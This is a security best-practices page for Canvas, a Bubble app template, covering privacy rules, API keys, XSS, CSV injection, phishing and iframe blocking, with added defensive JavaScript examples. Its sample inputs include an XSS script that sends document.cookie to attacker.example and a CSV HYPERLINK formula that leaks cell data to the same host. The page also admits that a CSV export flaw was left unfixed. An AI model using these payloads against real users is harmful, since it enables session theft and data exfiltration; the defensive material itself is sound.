Canvas Documentation
Bubble Best Practices
v3.7
Security

This page lays out best practices when it comes to making your app and your data secure.

Last updated 3 years ago

Enable SSL

SSL (in practice TLS) encrypts the data transmitted between the server and the browser, so page content, form submissions and session cookies cannot be read or altered by anyone on the network path. Make sure to set it up by checking the box located in the Settings > Domain/email section of the Bubble Editor; an app without it hands every logged-in user's session to anyone sharing their network.

Create privacy rules

Having robust privacy rules is essential in making sure that your server doesn't send data to a browser that the user is not supposed to see. A data type with no privacy rules is readable by anyone who can reach your app, whether or not your pages display those fields, so the rules belong on the data type itself rather than in page design. See the Database / privacy rules section (https://docs.airdev.co/canvas/using-bubble/database#privacy-rules) for more information about setting those up.

We also have a video walkthrough for Bubble Privacy Rules.

No "paywall" popups

In Bubble, you can create a popup that blocks the user from visually seeing or interacting with the page. However, these popups can be closed relatively easily using Developer Tools in the browser.

To put this in specific "Bubble-ese": you shouldn't rely on a popup with the setting This popup can't be closed by pressing Esc to lock users out of pages.

Don't store sensitive data in an unencrypted format

If your application needs to store very sensitive data, like Social Security numbers or credit card numbers, store it in encrypted format. Better yet, find another company (like Stripe or PayPal) that can handle these very risky transactions, and integrate them into your app through Bubble plugins or using the API Connector, so the raw values never reach your database at all.

Bubble does encrypt all data at rest, which makes data storage and data usage safer if you have authentication and privacy rules properly set up. But encryption at rest only protects the stored copy: if you've accidentally made your privacy rules looser than they should be, the server will decrypt those values and send them to any browser that asks. We would recommend encrypting the values that go into those sensitive fields yourself, in a backend workflow, and decrypting them only where they're used, so that a privacy-rule mistake exposes ciphertext rather than the data. The encryption key must never be available to the page (see the section on private API keys below).

Set minimum password requirements

Use the Define a password policy functionality found in the Settings > General section of the Bubble editor to set the minimum length, capital letter requirements, etc.

We recommend setting a minimum password length of 8 characters and requiring 1 capital letter and 1 number. Treat that as a floor rather than a target: length does more for password strength than composition rules, so raise the minimum if your users can tolerate it, and pair the policy with two factor authentication (see the Setting up two factor authentication guide).

Don't use private API keys/tokens on the page

If you need to make an API call that uses a secret key or a token, make sure that it's not populated on any page but is instead in one of these two places:

  1. In the API Connector, with the key marked as "Private"

  2. In a backend workflow

This will ensure that the user's browser never sees the API key/token. Anything placed on a page, including hidden elements and custom states, is sent to the browser and can be read with the developer tools, so "hidden" is not the same as "private".

Forum resource

If you're interested in learning more about how Bubble secures data in general, and some other security recommendations, you can read these security guidelines from early 2019 posted in the Bubble Forum by Josh (Bubble CTO and co-founder).

Testing privacy rules

To test whether privacy rules are set up correctly, it can be helpful to use a web browser's developer tools to examine what data is available to the user: log in as a user of each role (and once as a logged-out visitor), open the Network tab, and read the responses the page receives. Everything in those responses is available to that user, whether or not the page displays it. Here's a page that shows how to do that with Chrome.
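As an added example (not part of the Canvas docs), the check below turns the dev-tools inspection described in this section into something repeatable: paste a response body captured from the Network tab and compare it with the fields that role is supposed to see. The records and the allowlist are constructed for the example and are not Bubble's actual wire format; the technique is the same for any JSON response.

```javascript
// Added example, not part of the Canvas docs: compare a response captured
// from the browser's Network tab against the fields a given role is allowed
// to see, and list every extra field that was still sent. The records below
// are constructed for the example and are not Bubble's actual wire format;
// paste the real response body in their place when you run this.
function fieldsBeyondAllowlist(records, allowedFields) {
  const allowed = new Set(allowedFields);
  const exposed = [];
  records.forEach((record, index) => {
    for (const [field, value] of Object.entries(record)) {
      const empty = value === null || value === undefined || value === "";
      // An empty field is what a working privacy rule produces; a populated
      // one outside the allowlist means the rule is missing or too loose.
      if (!allowed.has(field) && !empty) exposed.push({ index, field });
    }
  });
  return exposed;
}

// What a logged-out visitor should see on a public member directory.
const PUBLIC_PROFILE_FIELDS = ["_id", "name", "avatar", "bio"];

// Constructed capture: what the page actually received for two users.
const capturedRecords = [
  { _id: "u1", name: "Alice", avatar: "a.png", bio: "Designer", email: "", phone: "" },
  { _id: "u2", name: "Bob", avatar: "b.png", bio: "", email: "bob@example.com", stripe_customer_id: "cus_123" },
];

function reportExposure(records = capturedRecords, allowedFields = PUBLIC_PROFILE_FIELDS) {
  const exposed = fieldsBeyondAllowlist(records, allowedFields);
  return exposed.map((e) => `record ${e.index}: field "${e.field}" sent to browser`);
}

console.log(reportExposure().join("\n") || "no fields beyond allowlist");
```

Run it once per role, with an allowlist written from the privacy rule you intended, not from what the page happens to display; the two disagreeing is exactly the gap you are looking for.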

Scanning files for malware

When users have the ability to upload files to your app that other users can download, ideally they should be scanned for malware. Some API based solutions for this include Scanii and Cloudmersive. Filestack also offers this option along with their file storage service, but is quite pricey.

This will help protect both admin users and standard users - if admins open these files somewhere in the admin portal or are sent these files via email, that would be an issue.

Note that some browsers (e.g. Chrome on Windows) have some built-in file scanning ability as well to prevent downloading files tagged as malware, so there are some built-in protections here for many users. Don't treat that as your only control: scan on upload, before the file is made available to anyone else.

Risks from plugins and custom code

Using community plugins and custom HTML in your Bubble app carries some inherent security risks with it.

One of those risks is that the plugin developer could be malicious and steal data from you, for example by having the plugin's front-end code report back on every browser that loads it. A plugin's code runs with the same access to the page as your own, so look at what it loads and where it sends data before installing it, and prefer plugins whose source you can read.

XSS (cross site scripting)

Another risk is the possibility that plugins will allow raw user data to run javascript in other users' browsers.

Bubble's native elements should all have protections built in to prevent users from executing javascript when users' data is shown to other users. Plugins, however, may not all have this set up. (The Bubble HTML element, of course, is an exception here, as it is intended to be able to include HTML and javascript, so never feed user-entered text into it unescaped.)

This is a risk when showing data on the front-end to users - for example, if I have a calendar plugin and I use it to display data from many users to each other, it's possible that one user will enter some executable code in a text field and that the plugin will execute that code when trying to display it. A quick smoke test is to save a value such as <b>bold</b> in the field and check whether the plugin shows the tags literally or renders them. There are many different ways to exploit XSS vulnerabilities, so the specific ways to test this will not be covered here. Canvas ships an XSS stopper + HTML whitelist (see the Functionality Reference) for sanitizing text before it is displayed.

CSV injection

When allowing for CSVs of user-entered data to be downloaded from an app, programs like Excel will evaluate formulas that are included in those CSVs. If a user's "About" field starts with a formula (a cell beginning with =, +, -, or @ is enough), an admin who opens the export can be made to execute programs outside of Excel, or to hit APIs and export the app's data. More info about the vulnerability here: https://owasp.org/www-community/attacks/CSV_Injection

For a Bubble-specific guide on how to deal with this bug, see the CSV injection prevention page in the Functionality Reference.

This is a known bug with Canvas' CSV export flow in the admin portal. We've decided to leave this vulnerability there for the moment, as it would add quite a bit of complexity to the app to remove it. All app admins should be made aware of this vulnerability and should open exports in a tool that does not evaluate formulas, or import the columns as text.
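As an added example (not the Canvas export flow or the Functionality Reference code), here is what a sanitized CSV export step looks like, following the OWASP CSV Injection guidance linked above: every text cell is quoted, a leading formula trigger character is prefixed with a single quote, and embedded double quotes are doubled. The rows are constructed sample data; numbers the app generated itself are emitted unquoted so a negative balance keeps its sign.

```javascript
// Added example, not part of the Canvas docs: a CSV export step that
// neutralises formula cells following the OWASP CSV Injection guidance
// (quote every text cell, prefix a leading trigger character with a single
// quote, double embedded quotes). The rows are constructed sample data.
const FORMULA_TRIGGERS = new Set(["=", "+", "-", "@", "\t", "\r"]);

function sanitizeCell(value) {
  // Numbers we generated ourselves are not user text and are emitted as-is,
  // so negative amounts keep their sign.
  if (typeof value === "number" && Number.isFinite(value)) return String(value);
  let text = value === null || value === undefined ? "" : String(value);
  // Check the first non-blank character too, in case the spreadsheet trims
  // leading whitespace before deciding whether a cell is a formula.
  const first = text.charAt(0);
  const firstNonBlank = text.trimStart().charAt(0);
  if (FORMULA_TRIGGERS.has(first) || FORMULA_TRIGGERS.has(firstNonBlank)) {
    text = "'" + text;
  }
  return `"${text.replace(/"/g, '""')}"`;
}

function toCsv(rows, columns) {
  const header = columns.map((col) => sanitizeCell(col)).join(",");
  const body = rows.map((row) => columns.map((col) => sanitizeCell(row[col])).join(","));
  return [header, ...body].join("\r\n");
}

// Constructed rows: one ordinary user and one whose About field is a formula
// that would send the neighbouring cell to an attacker's server when clicked.
const SAMPLE_ROWS = [
  { name: "Alice", about: 'Likes "quoted" text', balance: -12.5 },
  { name: "Mallory", about: '=HYPERLINK("https://attacker.example/?d="&A2,"click me")', balance: 0 },
];

console.log(toCsv(SAMPLE_ROWS, ["name", "about", "balance"]));
```

The trade-off of the single-quote prefix is cosmetic: when Excel opens a .csv file it shows the apostrophe in the cell rather than treating it as a text marker, so affected cells look slightly odd. That is preferable to an admin's spreadsheet running someone else's formula.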

Unsafe HTML in emails (phishing)

Emails can be used as a vector to steal user data, user credentials and other sensitive info. This relatively simple attack has been the cause of several high-profile cybersecurity breaches over the past few years. If your app sends emails that include content entered by users (messages, names, comments), insert that content as escaped text and build every link yourself; never render user-supplied HTML or user-supplied URLs into an email template, since a message that genuinely comes from your app's sender address is exactly what a phisher wants to borrow.
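One added example (not code from the Canvas docs or from any Canvas plugin) serves both the XSS section above and this one, since both come down to the same rule: user-entered text is inserted as text, never as markup, and links are built by the app. It shows the unsafe concatenation a plugin or HTML element can fall into, the escaped version, and an email template that applies the same escaping plus a URL scheme check. The event, user and URL values are constructed.

```javascript
// Added example, not part of the Canvas docs or of any Canvas plugin: the
// unsafe pattern a plugin or HTML element falls into when it concatenates
// user data into markup, next to the hardened version, and the same rule
// applied to an HTML email template. Event and user values are constructed.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(value).replace(/[&<>"']/g, (c) => map[c]);
}

// Vulnerable: whatever one user typed becomes markup in every viewer's browser.
function renderEventUnsafe(event) {
  return `<div class="event"><b>${event.title}</b><p>${event.notes}</p></div>`;
}

// Hardened: user text is escaped, so the only tags are the ones we wrote.
function renderEventSafe(event) {
  return `<div class="event"><b>${escapeHtml(event.title)}</b><p>${escapeHtml(event.notes)}</p></div>`;
}

// Links in emails are built by the app, never taken from user input; anything
// that is not plain http(s) falls back to a known-good URL.
function safeHttpUrl(candidate, fallback) {
  try {
    const url = new URL(candidate);
    if (url.protocol === "http:" || url.protocol === "https:") return url.href;
  } catch (e) {
    // not a parseable URL at all
  }
  return fallback;
}

function buildNotificationEmail(recipientName, message, link, appHome) {
  return [
    `<p>Hi ${escapeHtml(recipientName)},</p>`,
    `<blockquote>${escapeHtml(message)}</blockquote>`,
    `<p><a href="${escapeHtml(safeHttpUrl(link, appHome))}">Open in the app</a></p>`,
  ].join("");
}

// Constructed hostile input of the kind a calendar or comments plugin might
// receive from one user and display to others.
const hostileEvent = {
  title: 'Team sync<script>fetch("https://attacker.example/?c=" + document.cookie)</script>',
  notes: '<img src=x onerror="alert(1)">',
};

console.log(renderEventUnsafe(hostileEvent)); // script tag survives
console.log(renderEventSafe(hostileEvent));   // &lt;script&gt; ... shown as text
console.log(buildNotificationEmail("Alice", "<b>click</b> here", "javascript:alert(1)", "https://app.example/"));
```

In a plugin that writes to the DOM, the equivalent of renderEventSafe is to set textContent on an element you created, rather than assigning innerHTML built from user strings; the escaping function is for the cases where you have to produce a markup string, such as an email body.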

Block all iFrames of app

If your app allows other websites to display it in an iFrame, then other developers can much more easily impersonate your website or use its content to show on their own websites. Impersonating your website is useful in the case of a phishing attack, and a framed page can also be overlaid with invisible controls so that a user clicks your buttons without realizing it (clickjacking).

It is okay to allow all iFrames or iFrames from the same origin if your app has a valid reason for doing so and you are aware that this setting carries some amount of risk with it. Otherwise, it's best to block all iFrames of your site. Whichever you choose, verify it against the deployed app rather than the editor: browsers enforce framing restrictions through the X-Frame-Options and Content-Security-Policy frame-ancestors response headers, which you can read in the Network tab of the developer tools.
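As an added example (not part of the Canvas docs), the checker below reads a set of response headers copied from your deployed app and reports what framing a browser will permit, so you can confirm the setting you chose actually reached production. It follows the browser rules: a Content-Security-Policy frame-ancestors directive takes precedence, and X-Frame-Options is consulted only when that directive is absent. The header sets are constructed samples, not captured from Bubble.

```javascript
// Added example, not part of the Canvas docs: given the response headers of
// your deployed app (copy them from the Network tab or from `curl -I`), report
// what framing browsers will permit. Checks Content-Security-Policy
// frame-ancestors first, since it overrides X-Frame-Options when present,
// then falls back to X-Frame-Options. The header sets are constructed samples.
function framingPolicy(headers) {
  // Header names are case-insensitive; normalise before lookup.
  const lower = {};
  for (const [name, value] of Object.entries(headers)) lower[name.toLowerCase()] = value;

  const csp = lower["content-security-policy"] || "";
  const directive = csp
    .split(";")
    .map((d) => d.trim())
    .find((d) => d.toLowerCase().startsWith("frame-ancestors"));
  if (directive) {
    const sources = directive.split(/\s+/).slice(1).map((s) => s.toLowerCase());
    // An empty source list or 'none' means no page may frame this one.
    if (sources.length === 0 || sources.includes("'none'")) return "blocked";
    if (sources.length === 1 && sources[0] === "'self'") return "same-origin";
    return "allowed: " + sources.join(" ");
  }

  const xfo = (lower["x-frame-options"] || "").trim().toUpperCase();
  if (xfo === "DENY") return "blocked";
  if (xfo === "SAMEORIGIN") return "same-origin";
  return "allowed: any origin";
}

// Constructed header sets for the three settings discussed above.
const SAMPLE_RESPONSES = {
  blockAll: { "X-Frame-Options": "DENY", "Content-Security-Policy": "frame-ancestors 'none'" },
  sameOrigin: { "x-frame-options": "SAMEORIGIN" },
  allowAll: { "Content-Type": "text/html" },
};

for (const [name, headers] of Object.entries(SAMPLE_RESPONSES)) {
  console.log(`${name}: ${framingPolicy(headers)}`);
}
```

If the result for your production domain is "allowed: any origin" while the editor says iFrames are blocked, check whether a proxy or CDN in front of the app is stripping the header; the browser only honours what it actually receives.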
